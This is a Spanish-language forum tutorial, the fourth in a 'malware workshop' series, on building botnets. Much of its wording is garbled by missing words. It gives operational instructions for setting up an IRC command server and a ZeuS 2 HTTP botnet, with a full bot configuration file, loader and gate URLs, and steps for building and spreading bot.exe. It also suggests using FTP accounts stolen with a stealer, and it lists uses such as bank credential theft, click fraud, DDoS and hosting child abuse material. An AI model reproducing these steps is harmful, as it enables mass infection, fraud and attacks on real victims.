Taller de Malwares #4 [Botnets]

 


¿Qué es una Botnet?
  La palabra Botnet, proviene de Bot (robot). Están compuestos por un y por “zombies”, Los son los infectados por dicha Botnet, y el es el que utilizaremos darles órdenes por medio de comandos.

Tipos de Clientes
  Hay varias formas de manipular una Botnet, entre los cuales podemos resaltar los siguientes:

-   IRC
-  
-   Clientes de

  En el IRC, lo que hacemos es que todos nuestros conecten a un mismo de IRC y esperen órdenes por medio de comandos.

Como podemos ver en esta , todos los nombres de la derecha son infectados por esta Botnet.
  De forma muy similar pasa con el , los conectan a una misma , en donde tendremos un en el cual podremos introducir comandos.
Cuando digo Clientes de , hago referencia a que es similar a un troyano, con su Cliente-Servidor. Los conectan a una y desde nuestro podremos darles órdenes.

¿Cómo Funcionan las Botnets?
  Al igual que los troyanos, las Botnets están compuestas por un cliente-servidor.
  Se propagan rápidamente por y tienen distintos tipos de Spreads. Entre ellos podemos destacar el muy conocido spread por que seguramente más de una vez lo hemos visto.

En este caso un “photo39.zip” en donde supuestamente , pero no es más que un malware

En esta otra podemos ver que nos un que supuestamente tiene una canción. Pero no nos lleva a otro lado que no sea una infección segura…
También existe la infección en que es un medio de y la red social más utilizada hoy en día.

En los dos casos muestra que se ven tentadores, pero es un gusano que se propaga por . Asique si alguna vez entraron, lo más probable es que se hayan infectado…
Otro de infección es por URL.

 En este caso nos aparece una advertencia sobre la actualización de Player. Pero al dar en ejecutar, no haremos otra que cosa que sea ejecutar el server que nos infectara…
Así como estos que hemos visto, existen más formas de las cuales podremos infectarnos. Y por más que tengamos el actualizado, nos infectaremos igual. Más adelante veremos porque cuando veamos los métodos de indetectabilidad.
Las Botnets lo que producen siempre es una infección en cadena. Esto quiere decir que si yo infecto a un mío en el caso del o a un amigo del , este infectara a los suyos, y a su vez este a los suyos y así sucesivamente hasta formar una cadena de infección con miles y miles de PCs esperando mis órdenes atacar…

 
¿Para qué Sirven las Botnets?
Las Botnets son utilizadas hacer con la finalidad de obtener financiera poder sacarle provecho. Al tener buena propagación, se infectan miles de en busca de cuentas bancarias, tarjetas de , y otros logins de interés.
Otro uso que se le suele dar es el de abuso de con el que nos brinda adsense. De esta forma se puede obtener mayor cantidad de gracias a los que tengamos en nuestra Botnet y de esta forma ganar bastante dinero.
También es muy utilizada ataques de DDoS (Denegacion de distribuido) que sirve tirar websites, foros y puede llegar a causar daños en la base de o consumir el ancho de banda que deje de funcionar.
Otros usos que se les puede dar, que aunque no son muy vistos, es bueno mencionarlos:
· alojar warez, cracks, seriales, etc
· alojar pornográfico y pedofílico
· ataques de phishing
· privadas de intercambio de ilegal
· Sniffing de de confidenciales
· Distribución e de malware
· de

¿Qué diferencia hay entre un ataque DoS y un DDoS?

Ataque DoS
Un está preparado soportar una cierta cantidad de peticiones o conexiones simultáneas. Si supera ese límite de conexiones, pueden pasar dos cosas:
1)     La respuesta de las peticiones de los pueden ser lentas o nulas
2)     El se desconecta de la red y queda sin .

A eso se le llama ataque DoS (Denial o / Denegacion de Servicio) Satura el por medio de muchas peticiones de una misma que poco a poco va consumiendo recursos hasta que comience a rechazar las peticiones y comenzara a denegar el (DoS)
Como desventaja tiene que el puede ver de dónde vienen todos esos ataques, banea la y el ataque cesa…

Ataque DDoS

Esto es algo similar al ataque DoS, ya que este de ataque también consiste en tirar el . La diferencia está en que este ataque es distribuido. Esto quiere decir que no se ataca desde una sola como en el DoS, sino que son muchas PCs, haciendo peticiones al mismo . El de la no podrá saber de dónde viene el ataque, por lo tanto cuesta más detenerlo. A esto se lo llama Denegación de Distribuida (DDoS)

Este de ataque (DDoS) Se hace con una red Zombie. En otras palabras, se hace con una Botnet.
En ambos casos lo que se busca es consumir el ancho de banda del tirar la .
Obviamente es mucho más potente un ataque con una Botnet ya que son varias PCs las que atacan a un sitio.

¿Cómo montar una Botnet?
Si bien mencione antes los 3 tipos de Botnets, ya sea por IRC, HTTP, o un ejecutable programado en algún lenguaje. En los tres casos vemos que los deben apuntar al mismo sitio. En el caso del IRC, apuntarlo a un registrado en algún . Si es por HTTP, apuntarlo a un host y si es por de , apuntarlo a algún subdominio (DNS). En todos los casos corremos riesgos de perder todos los remotos, ya que puede ser denunciada o que nos descubran.
Ahora les enseñare cómo montar una Botnet.

BOTNET POR IRC
Lo que debemos hacer es tener una buena con buena que todos los remotos. Una vez que la tenemos, podemos crear un de IRC y mandar a todos los ahí. De esta manera no se perderán con facilidad todos los remotos que tengamos.
Montaremos un de IRC en nuestra propia .
Descargamos el IRCPlus, Lo instalamos y nos vamos a su principal de configuración:

Colocamos un nombre en el Server y una descripción.
Es importante aclarar que el puerto que pongamos, en mi caso el 2000, debe estar abierto en nuestro en caso de que tengamos. En caso de tener y no tenerlo abierto, lo abrimos de la misma forma que cuando usamos un troyano.
El resto de las opciones son a su gusto, como por ejemplo la de los canales:

Importantísimo lo que esta remarcado en rojo, ya que de esta forma podrán entrar todos los a nuestro sin ningún de restricción.
También es bueno crear un user admin controlar el y el .
Registramos el Nick:

Y luego Vamos a Operators

Como pueden ver, ahí mi user esta como del IRC.
Ahora vamos a nuestro de irc

Colocamos /server “NO-IP” o
En mi caso coloque mi no-ip de test

Ahí nos da una bienvenida.
Identifico mi user de la siguiente manera
/pass “Password”
Ejemplo: /pass 12345
Y por ultimo entramos al canal:

Bueno, ahí entraran nuestros y podremos manipularlos por comandos definidos previamente en la botnet.
Aca les pongo una captura de ejemplo de cómo se ve una botnet por IRC. Cuando entran

Como ven el primero de es el del , quien manipulara la Botnet, y el resto son los .
De esta forma, no podrán darnos de baja el ya que el lo tendremos montado en nuestra propia . Lo único malo es que pueden localizar en donde está el . Esto corre bajo sus propios riesgos.

BOTNET POR HTTP
Ahora les enseñare a cómo montar una Botnet por HTTP. En este caso utilizaremos la ZEUS Botnet 2 que es la más reciente.
Les mostrare como montarla con las configuraciones básicas, ya que se pueden agregar opciones más avanzadas, pero no complicarla tanto, veremos lo básico que quede funcionando.
En la carpeta de la Botnet podremos ver todos estos directorios

La carpeta llamada “server[php]” es la que debemos subir a algún . Este no debe ser gratuito.
todos los que vienen siguiendo y practicando estos , podrán notar que pueden utilizar algún FTP con Cpanel capturada con el Stealer.
Dentro de esta carpeta podremos ver los siguientes ficheros y directorios:

Abrimos el de FTP y los subimos a todos

Una vez hecho esto, lo que deberemos hacer, es crear una base de y un que acceda a ella.
ello debemos ir al Cpanel ---> Bases de

Una vez creada, haremos también un

Y finalmente las vinculamos

Le damos todos los permisos a la cuenta

   
Y Listo, ya tenemos hecha nuestra base de , que será en donde se guarden todos los logs que capturemos.
Ahora configuraremos el server del Bot. ello vamos al directorio Builder y abrimos el llamado config.txt
Les pego el texto plano del *.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
;Build time:   22:38:59 11.03.2011 GMT
;Version:      2.0.8.9
 
entry "StaticConfig"
  ;botnet "btn1"
  timer_config 60 1
  timer_logs 1 1
  timer_stats 20 1
  remove_certs 1
  disable_tcpserver 0
  encryption_key "secret key"
end
 
entry "DynamicConfig"
  url_loader "http://localhost/bot.exe"
  url_server "http://localhost/gate.php"
  file_webinjects "webinjects.txt"
  entry "AdvancedConfigs"
  end
  entry "WebFilters"
    "!*.microsoft.com/*"
    "!http://*myspace.com*"
    "!http://*odnoklassniki.ru/*"
    "@*/login.osmp.ru/*"
    "@*/atl.osmp.ru/*"
  end
  entry "WebDataFilters"
    ;"http://mail.rambler.ru/*" "passw;login"
  end
  entry "WebFakes"
  end
end
Y acá una de cómo debería quedar:

Pasare a explicar las modificaciones:
;botnet "btn1"
Modificamos a lo que está entre comillas por localhost, que será en donde estará situada la botnet.
url_config "http://localhost/config.bin"
Modificamos la Url por la nuestra. En este caso debemos especificar en donde se encuentra el config.bin (que aun no hemos creado, pero es el directorio que se estima que estará)
encryption_key "secret key"
Acá debemos poner una llave secreta. Que es un código que nosotros queramos. En mi caso presione varias teclas al azar.
url_loader "http://localhost/bot.exe"
url_server "http://localhost/gate.php"
Por último tenemos estas dos, una es en donde tenemos el bot.exe (que aun no lo hemos creado, pero es en donde estará alojado) Y el otro es el gate.php que ya hemos subido previamente.
Ahora abrimos el zsb crear el config.bin y el bot.exe que nos faltan.

En Encryption Key, la llave que colocamos en el config.txt
Seguido a esto vamos a Builder.
Damos en Browse… y Buscamos el config.txt
Seguido a esto damos en “Build the Bot Configuration
Guardamos el config.bin que nos genera y finalmente damos en “Build the bot Executable
Y guardamos el bot.exe

Ahora si subimos el config.bin y el bot.exe por FTP.

Una vez hecho esto, ya estamos en condiciones de comenzar a infectar.
Ese bot.exe que generamos es el server que debemos propagar.

Entramos vía a nuestro . Recuerden que el es ese que se llama cp.php

Procederé a autoinfectarme, probar si funciona (Ustedes no hagan este paso ya que dañara severamente su ordenador)
Una vez ejecutado el server, este desaparecerá y conectara a nuestro vía , Se verá algo así:

Si investigan un poco el del bot, podrán ver las opciones ver los logs, atacar webs, etc…
También tenemos la Botnet con de que no es necesario que la explique ya que no es muy frecuente verla y se configura de igual forma que un troyano común.
Este expuesto es con fines educativos. No me hago responsable del mal uso que se le pueda dar.